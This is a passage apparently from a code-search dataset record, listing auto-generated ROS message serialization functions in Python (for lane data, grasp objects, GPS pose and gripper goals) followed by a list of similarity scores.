_x.camera_lane.r_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.r_laneTCL, _x.camera_lane.next_l_laneViewRangStart, _x.camera_lane.next_l_laneViewRangEnd, _x.camera_lane.next_l_numoflaneline, _x.camera_lane.next_l_lanelineid, _x.camera_lane.next_l_lanepositon, _x.camera_lane.next_l_lanecurvature, _x.camera_lane.next_l_lanecurvaturederivative, _x.camera_lane.next_l_lane_type, _x.camera_lane.next_l_heading_angle, _x.camera_lane.next_l_lane_mark_color, _x.camera_lane.next_l_laneQuality, _x.camera_lane.next_l_laneWidthMarking, _x.camera_lane.next_r_laneViewRangStart, _x.camera_lane.next_r_laneViewRangEnd, 
_x.camera_lane.next_r_numoflaneline, _x.camera_lane.next_r_lanelineid, _x.camera_lane.next_r_lanepositon, _x.camera_lane.next_r_lanecurvature, _x.camera_lane.next_r_lanecurvaturederivative, _x.camera_lane.next_r_lane_type, _x.camera_lane.next_r_heading_angle, _x.camera_lane.next_r_lane_mark_color, _x.camera_lane.next_r_laneQuality, _x.camera_lane.next_r_laneWidthMarking, _x.camera_lane.highwayConstructionArea, _x.camera_lane.highwayRoadType, _x.camera_lane.highwayHighwayExitRight, _x.camera_lane.highwayHighwayExitLeft, _x.camera_lane.highwayProbabilityLeftLane, _x.camera_lane.highwayProbabilityRightLane, _x.camera_lane.highwayDriving_peed_left_lane, _x.camera_lane.highwayDriving_peed_right_lane, _x.camera_lane.highwayprotocol_version))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.graspable_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.graspable_objects:\n _x = val1.reference_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(val1.potential_models)\n buff.write(_struct_I.pack(length))\n for val2 in val1.potential_models:\n _x = val2.model_id\n buff.write(_get_struct_i().pack(_x))\n _v63 = val2.type\n _x = _v63.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v63.db\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v64 = val2.pose\n _v65 = _v64.header\n _x = _v65.seq\n buff.write(_get_struct_I().pack(_x))\n _v66 = _v65.stamp\n _x = _v66\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v65.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v67 = _v64.pose\n _v68 = _v67.position\n _x = _v68\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _v69 = _v67.orientation\n _x = _v69\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n _x = val2.confidence\n buff.write(_get_struct_f().pack(_x))\n _x = val2.detector_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v70 = val1.cluster\n _v71 = _v70.header\n _x = _v71.seq\n buff.write(_get_struct_I().pack(_x))\n _v72 = _v71.stamp\n _x = _v72\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v71.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(_v70.points)\n buff.write(_struct_I.pack(length))\n for val3 in _v70.points:\n _x = val3\n buff.write(_get_struct_3f().pack(_x.x, _x.y, _x.z))\n length = len(_v70.channels)\n buff.write(_struct_I.pack(length))\n for val3 in _v70.channels:\n _x = val3.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, 
_x))\n length = len(val3.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val3.values.tostring())\n _v73 = val1.region\n _v74 = _v73.cloud\n _v75 = _v74.header\n _x = _v75.seq\n buff.write(_get_struct_I().pack(_x))\n _v76 = _v75.stamp\n _x = _v76\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v75.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v74\n buff.write(_get_struct_2I().pack(_x.height, _x.width))\n length = len(_v74.fields)\n buff.write(_struct_I.pack(length))\n for val4 in _v74.fields:\n _x = val4.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val4\n buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))\n _x = _v74\n buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))\n _x = _v74.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v74.is_dense\n buff.write(_get_struct_B().pack(_x))\n length = len(_v73.mask)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(_v73.mask.tostring())\n _v77 = _v73.image\n _v78 = _v77.header\n _x = _v78.seq\n buff.write(_get_struct_I().pack(_x))\n _v79 = _v78.stamp\n _x = _v79\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v78.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v77\n buff.write(_get_struct_2I().pack(_x.height, _x.width))\n _x = _v77.encoding\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v77\n buff.write(_get_struct_BI().pack(_x.is_bigendian, _x.step))\n _x = _v77.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v80 = _v73.disparity_image\n _v81 = _v80.header\n _x = _v81.seq\n buff.write(_get_struct_I().pack(_x))\n _v82 = _v81.stamp\n _x = _v82\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v81.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v80\n buff.write(_get_struct_2I().pack(_x.height, _x.width))\n _x = _v80.encoding\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v80\n buff.write(_get_struct_BI().pack(_x.is_bigendian, _x.step))\n _x = _v80.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v83 = _v73.cam_info\n _v84 = _v83.header\n _x = _v84.seq\n buff.write(_get_struct_I().pack(_x))\n _v85 = _v84.stamp\n _x 
= _v85\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v84.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v83\n buff.write(_get_struct_2I().pack(_x.height, _x.width))\n _x = _v83.distortion_model\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(_v83.D)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(_v83.D.tostring())\n buff.write(_v83.K.tostring())\n buff.write(_v83.R.tostring())\n buff.write(_v83.P.tostring())\n _x = _v83\n buff.write(_get_struct_2I().pack(_x.binning_x, _x.binning_y))\n _v86 = _v83.roi\n _x = _v86\n buff.write(_get_struct_4IB().pack(_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify))\n _v87 = _v73.roi_box_pose\n _v88 = _v87.header\n _x = _v88.seq\n buff.write(_get_struct_I().pack(_x))\n _v89 = _v88.stamp\n _x = _v89\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v88.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v90 = _v87.pose\n _v91 = _v90.position\n _x = _v91\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _v92 = _v90.orientation\n _x = _v92\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n _v93 = _v73.roi_box_dims\n _x = _v93\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _x = val1.collision_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs))\n _x = self.image.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2I().pack(_x.image.height, _x.image.width))\n _x = self.image.encoding\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_BI().pack(_x.image.is_bigendian, _x.image.step))\n _x = self.image.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_info.header.seq, _x.camera_info.header.stamp.secs, _x.camera_info.header.stamp.nsecs))\n _x = self.camera_info.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2I().pack(_x.camera_info.height, _x.camera_info.width))\n _x = self.camera_info.distortion_model\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.camera_info.D)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.camera_info.D.tostring())\n 
buff.write(self.camera_info.K.tostring())\n buff.write(self.camera_info.R.tostring())\n buff.write(self.camera_info.P.tostring())\n _x = self\n buff.write(_get_struct_6IB().pack(_x.camera_info.binning_x, _x.camera_info.binning_y, _x.camera_info.roi.x_offset, _x.camera_info.roi.y_offset, _x.camera_info.roi.height, _x.camera_info.roi.width, _x.camera_info.roi.do_rectify))\n length = len(self.meshes)\n buff.write(_struct_I.pack(length))\n for val1 in self.meshes:\n length = len(val1.triangles)\n buff.write(_struct_I.pack(length))\n for val2 in val1.triangles:\n buff.write(val2.vertex_indices.tostring())\n length = len(val1.vertices)\n buff.write(_struct_I.pack(length))\n for val2 in val1.vertices:\n _x = val2\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _x = self\n buff.write(_get_struct_7d().pack(_x.reference_to_camera.position.x, _x.reference_to_camera.position.y, _x.reference_to_camera.position.z, _x.reference_to_camera.orientation.x, _x.reference_to_camera.orientation.y, _x.reference_to_camera.orientation.z, _x.reference_to_camera.orientation.w))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _serialize_array(self, array):\n buffer = io.BytesIO()\n np.save(buffer, array)\n return buffer.getvalue()", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_2IQB3I.pack(_x.unique_key, _x.gps_week, _x.gps_millisecond, _x.video_id, _x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs))\n _x = self.image.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_d21i7bBI6d13i2I.pack(_x.image.localPose.time, _x.image.localPose.dr_x, _x.image.localPose.dr_y, _x.image.localPose.dr_z, _x.image.localPose.dr_heading, _x.image.localPose.dr_roll, _x.image.localPose.dr_pitch, _x.image.localPose.lf_speed, _x.image.localPose.rf_speed, _x.image.localPose.lr_speed, _x.image.localPose.rr_speed, _x.image.localPose.rot_x, _x.image.localPose.rot_y, _x.image.localPose.rot_z, _x.image.localPose.acc_x, _x.image.localPose.acc_y, _x.image.localPose.acc_z, _x.image.localPose.batteryState, _x.image.localPose.batteryEnergy, _x.image.localPose.steer, _x.image.localPose.brake, _x.image.localPose.fuel, _x.image.localPose.trans, _x.image.localPose.VehicleState, _x.image.localPose.mode, _x.image.localPose.drStatus, _x.image.localPose.errorStatus, _x.image.localPose.emergency_flag, _x.image.localPose.hardswitch_on, _x.image.gpsPos.gps_flag, _x.image.gpsPos.gps_week, _x.image.gpsPos.gps_millisecond, _x.image.gpsPos.longitude, _x.image.gpsPos.laltitude, _x.image.gpsPos.gaussX, _x.image.gpsPos.gaussY, _x.image.gpsPos.height, _x.image.gpsPos.pitch, _x.image.gpsPos.roll, _x.image.gpsPos.azimuth, _x.image.gpsPos.northVelocity, _x.image.gpsPos.eastVelocity, _x.image.gpsPos.upVelocity, _x.image.gpsPos.positionStatus, _x.image.gpsPos.rot_x, _x.image.gpsPos.rot_y, _x.image.gpsPos.rot_z, _x.image.gpsPos.acc_x, _x.image.gpsPos.acc_y, _x.image.gpsPos.acc_z, _x.image.height, _x.image.width))\n _x = self.image.encoding\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n 
if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_BI.pack(_x.image.is_bigendian, _x.image.step))\n _x = self.image.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def send_ndarray(sock, data):\n with io.BytesIO() as f:\n np.save(f, data)\n byte_data = f.getvalue()\n\n # Pack message length\n msg = struct.pack('>I', len(byte_data)) + byte_data\n sock.sendall(msg)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2i3I().pack(_x.manip_return_code, _x.object_grabber_return_code, _x.des_gripper_pose.header.seq, _x.des_gripper_pose.header.stamp.secs, _x.des_gripper_pose.header.stamp.nsecs))\n _x = self.des_gripper_pose.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7di3I().pack(_x.des_gripper_pose.pose.position.x, _x.des_gripper_pose.pose.position.y, _x.des_gripper_pose.pose.position.z, _x.des_gripper_pose.pose.orientation.x, _x.des_gripper_pose.pose.orientation.y, _x.des_gripper_pose.pose.orientation.z, _x.des_gripper_pose.pose.orientation.w, _x.object_finder_return_code, _x.object_pose.header.seq, _x.object_pose.header.stamp.secs, _x.object_pose.header.stamp.nsecs))\n _x = self.object_pose.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7d().pack(_x.object_pose.pose.position.x, _x.object_pose.pose.position.y, _x.object_pose.pose.position.z, _x.object_pose.pose.orientation.x, _x.object_pose.pose.orientation.y, _x.object_pose.pose.orientation.z, _x.object_pose.pose.orientation.w))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.ctrl.header.seq, _x.ctrl.header.stamp.secs, _x.ctrl.header.stamp.nsecs))\n _x = self.ctrl.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3I.pack(_x.ctrl.left_em.header.seq, _x.ctrl.left_em.header.stamp.secs, _x.ctrl.left_em.header.stamp.nsecs))\n _x = self.ctrl.left_em.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_f3I.pack(_x.ctrl.left_em.rate, _x.ctrl.right_em.header.seq, _x.ctrl.right_em.header.stamp.secs, _x.ctrl.right_em.header.stamp.nsecs))\n _x = 
self.ctrl.right_em.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_f3I.pack(_x.ctrl.right_em.rate, _x.ctrl.left_em_servo.header.seq, _x.ctrl.left_em_servo.header.stamp.secs, _x.ctrl.left_em_servo.header.stamp.nsecs))\n _x = self.ctrl.left_em_servo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2fB3I.pack(_x.ctrl.left_em_servo.anglex, _x.ctrl.left_em_servo.angley, _x.ctrl.left_em_servo.fix, _x.ctrl.right_em_servo.header.seq, _x.ctrl.right_em_servo.header.stamp.secs, _x.ctrl.right_em_servo.header.stamp.nsecs))\n _x = self.ctrl.right_em_servo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2fB.pack(_x.ctrl.right_em_servo.anglex, _x.ctrl.right_em_servo.angley, _x.ctrl.right_em_servo.fix))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_4B3I.pack(_x.s1, _x.s2, _x.s3, _x.s4, _x.p1.header.seq, _x.p1.header.stamp.secs, _x.p1.header.stamp.nsecs))\n _x = self.p1.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3d3I.pack(_x.p1.point.x, _x.p1.point.y, _x.p1.point.z, _x.p2.header.seq, _x.p2.header.stamp.secs, _x.p2.header.stamp.nsecs))\n _x = self.p2.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3d3I.pack(_x.p2.point.x, _x.p2.point.y, _x.p2.point.z, _x.p3.header.seq, _x.p3.header.stamp.secs, _x.p3.header.stamp.nsecs))\n _x = self.p3.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3d3I.pack(_x.p3.point.x, _x.p3.point.y, _x.p3.point.z, _x.p4.header.seq, _x.p4.header.stamp.secs, _x.p4.header.stamp.nsecs))\n _x = self.p4.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3d.pack(_x.p4.point.x, _x.p4.point.y, _x.p4.point.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_2i.pack(_x.watch_dog, _x.num))\n for val1 in self.users:\n _x = val1\n buff.write(_struct_2i.pack(_x.id, _x.trackedId))\n _v25 = val1.date_discovered\n _x = _v25\n buff.write(_struct_2I.pack(_x.t_sec, _x.t_usec))\n _v26 = val1.date\n _x = _v26\n buff.write(_struct_2I.pack(_x.t_sec, _x.t_usec))\n _v27 = val1.state\n buff.write(_struct_I.pack(_v27.value))\n _v28 = val1.skeleton\n for val3 in _v28.joint:\n buff.write(_struct_d.pack(val3.confidence))\n _v29 = 
val3.position\n _x = _v29\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v30 = _v28.unused\n buff.write(_struct_I.pack(_v30.value))\n for val1 in self.filtered_users:\n _x = val1\n buff.write(_struct_2i.pack(_x.id, _x.trackedId))\n _v31 = val1.date_discovered\n _x = _v31\n buff.write(_struct_2I.pack(_x.t_sec, _x.t_usec))\n _v32 = val1.date\n _x = _v32\n buff.write(_struct_2I.pack(_x.t_sec, _x.t_usec))\n _v33 = val1.state\n buff.write(_struct_I.pack(_v33.value))\n _v34 = val1.skeleton\n for val3 in _v34.joint:\n buff.write(_struct_d.pack(val3.confidence))\n _v35 = val3.position\n _x = _v35\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v36 = _v34.unused\n buff.write(_struct_I.pack(_v36.value))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2I().pack(_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs))\n _x = self.goal_id.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2i3I().pack(_x.goal.action_code, _x.goal.object_code, _x.goal.pickup_frame.header.seq, _x.goal.pickup_frame.header.stamp.secs, _x.goal.pickup_frame.header.stamp.nsecs))\n _x = self.goal.pickup_frame.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.goal.pickup_frame.pose.position.x, _x.goal.pickup_frame.pose.position.y, _x.goal.pickup_frame.pose.position.z, _x.goal.pickup_frame.pose.orientation.x, _x.goal.pickup_frame.pose.orientation.y, _x.goal.pickup_frame.pose.orientation.z, _x.goal.pickup_frame.pose.orientation.w, _x.goal.dropoff_frame.header.seq, _x.goal.dropoff_frame.header.stamp.secs, _x.goal.dropoff_frame.header.stamp.nsecs))\n _x = self.goal.dropoff_frame.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.goal.dropoff_frame.pose.position.x, _x.goal.dropoff_frame.pose.position.y, _x.goal.dropoff_frame.pose.position.z, _x.goal.dropoff_frame.pose.orientation.x, _x.goal.dropoff_frame.pose.orientation.y, _x.goal.dropoff_frame.pose.orientation.z, _x.goal.dropoff_frame.pose.orientation.w, _x.goal.gripper_goal_frame.header.seq, _x.goal.gripper_goal_frame.header.stamp.secs, _x.goal.gripper_goal_frame.header.stamp.nsecs))\n _x = self.goal.gripper_goal_frame.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_7di().pack(_x.goal.gripper_goal_frame.pose.position.x, _x.goal.gripper_goal_frame.pose.position.y, _x.goal.gripper_goal_frame.pose.position.z, _x.goal.gripper_goal_frame.pose.orientation.x, _x.goal.gripper_goal_frame.pose.orientation.y, _x.goal.gripper_goal_frame.pose.orientation.z, _x.goal.gripper_goal_frame.pose.orientation.w, 
_x.goal.perception_source))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, _x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, _x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1,) = _get_struct_56B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill" ]
[ "0.7994329", "0.7972612", "0.7893365", "0.785495", "0.7740611", "0.7677824", "0.7657543", "0.7626826", "0.75874037", "0.7565361", "0.75626636", "0.75620574", "0.7558187", "0.75431186", "0.7534563", "0.7527763", "0.75262064", "0.75172293", "0.75110817", "0.749996", "0.7497972", "0.74832374", "0.7479107", "0.7471709", "0.74682605", "0.74646646", "0.746435", "0.7463879", "0.74623495", "0.7449862", "0.7434278", "0.74337375", "0.7427498", "0.7426039", "0.74255985", "0.74241513", "0.73966664", "0.73915565", "0.73834527", "0.7379829", "0.7377253", "0.73752964", "0.73728055", "0.7370881", "0.73664415", "0.7365433", "0.73633677", "0.73552924", "0.7338015", "0.7320973", "0.7320606", "0.73123485", "0.73077923", "0.73068595", "0.73025703", "0.72980374", "0.7287885", "0.72803277", "0.7252093", "0.72514594", "0.72465616", "0.72408265", "0.72400105", "0.7233364", "0.72187835", "0.72177404", "0.7214914", "0.7209451", "0.71995455", "0.71938413", "0.7181025", "0.71587664", "0.71371704", "0.71153873", "0.71128285", "0.70999646", "0.70889825", "0.70350146", "0.70346206", "0.7028944", "0.7024778", "0.7012065", "0.7007262", "0.7001727", "0.69979334", "0.69866544", "0.6969084", "0.6950105", 